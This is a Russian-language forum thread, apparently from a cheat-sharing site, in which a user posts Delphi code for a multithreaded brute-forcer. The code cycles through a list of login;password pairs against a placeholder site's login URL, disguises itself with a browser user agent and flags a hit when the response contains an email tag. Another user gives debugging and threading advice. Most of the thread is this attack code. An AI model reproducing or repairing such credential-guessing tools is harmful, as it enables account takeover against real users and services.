Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Ответ
 
Опции темы
Старый 19.10.2012, 23:46   #1
 Разведчик
Аватар для MastaDan
 
MastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компании
Регистрация: 03.10.2011
Сообщений: 27
Популярность: 1039
Сказал(а) спасибо: 131
Поблагодарили 98 раз(а) в 47 сообщениях
Отправить сообщение для MastaDan с помощью ICQ Отправить сообщение для MastaDan с помощью Skype™
 
Question Брутфорс в url
Всем привет.
Столкнулся с проблемой.
Брут перебирает логины и пассы по линку
Пример(Get):
HTTP.Get('https://blabla.net/loginregist/login='+FAcc+'&pass='+FPas);

Замаскировался под браузер
Код:
   HTTP.Request.UserAgent:= 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4';
     Http.Request.Host:='blabla.net';
     Http.Request.Accept:='text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5';
     Http.Request.AcceptCharSet:='windows-1251,utf-8;q=0.7,*;q=0.7';
     Http.Request.AcceptEncoding:='gzip,deflate, identity';
     Http.Request.AcceptLanguage:='ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3';
Проверку сделал по ResponseCode (200 = сайт валид осылает)
// if http.ResponseCode<>200 then
и пробовал по поиску строки в коде
if Pos('<Email>',Link)<>0 then

Странно то что он все пихает в бед, снифер его даже не ловит запросы.
Что я где накасячил ?

Отрывок кода.

Код:
 begin
     FAcc:= Copy(Accounts[CurAcc],1,Pos(';',Accounts[CurAcc])-1);
     FPas:= Copy(Accounts[CurAcc],Pos(';',Accounts[CurAcc])+1,Length(Accounts[CurAcc]));

     data:=Tstringlist.create;
     data.Add('login='+FAcc);
     data.Add('password='+FPas);
     HTTP:=TIdHTTP.create;
     HTTP.HandleRedirects:=false;
     HTTP.Request.UserAgent:= 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4';
     Http.Request.Host:='blabla.net';
     Http.Request.Accept:='text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5';
     Http.Request.AcceptCharSet:='windows-1251,utf-8;q=0.7,*;q=0.7';
     Http.Request.AcceptEncoding:='gzip,deflate, identity';
     Http.Request.AcceptLanguage:='ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3';
      try
        Link:=HTTP.Get('https://blabla.net/loginregist/login='+FAcc+'&pass='+FPas);
      Rez:=-1;
     except
        if Pos('<Email>',Link)<>0 then
     // if http.ResponseCode<>200then
Прошу сильно не пинать, первый раз столкнулся с написание брута, которые подставляет в url лог и пасс.

Касяк то что это Get ?
С ним как с Post запросом уже не "зафигачить" ?
________________

Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Последний раз редактировалось MastaDan; 19.10.2012 в 23:57.
  Ответить с цитированием
Старый 19.10.2012, 23:53   #2
 Старший сержант
Аватар для metraz
 
metraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядом
Регистрация: 25.12.2011
Сообщений: 191
Популярность: 5259
Сказал(а) спасибо: 31
Поблагодарили 235 раз(а) в 135 сообщениях
Отправить сообщение для metraz с помощью Skype™
 
По умолчанию Re: Брутфорс в url
Сей код так понимаю в цикле? Данного куска куда недостаточно чтоб понять. Возможно дело в data.free, которого в данном коде нет.
________________

Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
  Ответить с цитированием
Старый 19.10.2012, 23:55   #3
 Разведчик
Аватар для MastaDan
 
MastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компании
Регистрация: 03.10.2011
Сообщений: 27
Популярность: 1039
Сказал(а) спасибо: 131
Поблагодарили 98 раз(а) в 47 сообщениях
Отправить сообщение для MastaDan с помощью ICQ Отправить сообщение для MastaDan с помощью Skype™
 
По умолчанию Re: Брутфорс в url
Код:
procedure TNewThread.Execute;
var CurAcc:integer;
    data:Tstringlist;
    HTTP: TIdHTTP;
    Link: String;
begin
 while Work do
  begin
   CS.Enter;
   Inc(Acc);
   if Acc<Accounts.Count then CurAcc:=Acc else Work:=false;
   CS.Leave;

   if Work then
begin
     FAcc:= Copy(Accounts[CurAcc],1,Pos(';',Accounts[CurAcc])-1);
     FPas:= Copy(Accounts[CurAcc],Pos(';',Accounts[CurAcc])+1,Length(Accounts[CurAcc]));

     data:=Tstringlist.create;
     data.Add('login='+FAcc);
     data.Add('password='+FPas);
     HTTP:=TIdHTTP.create;
     HTTP.HandleRedirects:=false;
     HTTP.Request.UserAgent:= 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4';
     Http.Request.Host:='blabla.net';
     Http.Request.Accept:='text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5';
     Http.Request.AcceptCharSet:='windows-1251,utf-8;q=0.7,*;q=0.7';
     Http.Request.AcceptEncoding:='gzip,deflate, identity';
     Http.Request.AcceptLanguage:='ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3';
      try
        Link:=HTTP.Get('https://blabla.net/loginregist/login='+FAcc+'&pass='+FPas);
      Rez:=-1;
     except
        if Pos('<Email>',Link)<>0 then
     // if http.ResponseCode<>200then
Rez:=1
      else

       Rez:=-1;
     end;
     HTTP.Free;
     data.Free;

     Synchronize(Sync);
    end;
  end;
end;
________________

Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
  Ответить с цитированием
Старый 20.10.2012, 00:23   #4
 Старший сержант
Аватар для metraz
 
metraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядомmetraz в состоянии испепелить взглядом
Регистрация: 25.12.2011
Сообщений: 191
Популярность: 5259
Сказал(а) спасибо: 31
Поблагодарили 235 раз(а) в 135 сообщениях
Отправить сообщение для metraz с помощью Skype™
 
По умолчанию Re: Брутфорс в url
Цитата:
Сообщение от MastaDanПосмотреть сообщение
Код:
procedure TNewThread.Execute;
var CurAcc:integer;
    data:Tstringlist;
    HTTP: TIdHTTP;
    Link: String;
begin
 while Work do
  begin
   CS.Enter;
   Inc(Acc);
   if Acc<Accounts.Count then CurAcc:=Acc else Work:=false;
   CS.Leave;

   if Work then
begin
     FAcc:= Copy(Accounts[CurAcc],1,Pos(';',Accounts[CurAcc])-1);
     FPas:= Copy(Accounts[CurAcc],Pos(';',Accounts[CurAcc])+1,Length(Accounts[CurAcc]));

     data:=Tstringlist.create;
     data.Add('login='+FAcc);
     data.Add('password='+FPas);
     HTTP:=TIdHTTP.create;
     HTTP.HandleRedirects:=false;
     HTTP.Request.UserAgent:= 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4';
     Http.Request.Host:='blabla.net';
     Http.Request.Accept:='text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5';
     Http.Request.AcceptCharSet:='windows-1251,utf-8;q=0.7,*;q=0.7';
     Http.Request.AcceptEncoding:='gzip,deflate, identity';
     Http.Request.AcceptLanguage:='ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3';
      try
        Link:=HTTP.Get('https://blabla.net/loginregist/login='+FAcc+'&pass='+FPas);
      Rez:=-1;
     except
        if Pos('<Email>',Link)<>0 then
     // if http.ResponseCode<>200then
Rez:=1
      else

       Rez:=-1;
     end;
     HTTP.Free;
     data.Free;

     Synchronize(Sync);
    end;
  end;
end;

Если брут многопоточный, то лучше использовать не synhonize а критические секции. Но это мое мнение. Либо сменить инди на синапс)
________________

Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
  Ответить с цитированием
Старый 20.10.2012, 00:27   #5
 Разведчик
Аватар для MastaDan
 
MastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компанииMastaDan душа компании
Регистрация: 03.10.2011
Сообщений: 27
Популярность: 1039
Сказал(а) спасибо: 131
Поблагодарили 98 раз(а) в 47 сообщениях
Отправить сообщение для MastaDan с помощью ICQ Отправить сообщение для MastaDan с помощью Skype™
 
По умолчанию Re: Брутфорс в url
В синапсе я вообще не але)
Интересно почему снифер его даже не ловит х_х
________________

Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
  Ответить с цитированием
Ответ

« Предыдущая тема | Следующая тема »

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обсуждение] Брутфорс apshel17 Вопросы, просьбы, обсуждение 0 25.03.2012 00:34
[Помогите!] Брутфорс Tomal Свободное обсуждение 3 24.09.2011 18:24

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 16:18.

Обратная связь - Zhyk.org - Первый Чит-портал RUнета без хайдов! - Архив - Условия использования - Вверх
Пишите нам: forum@zhyk.ru
Copyright © 2025 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net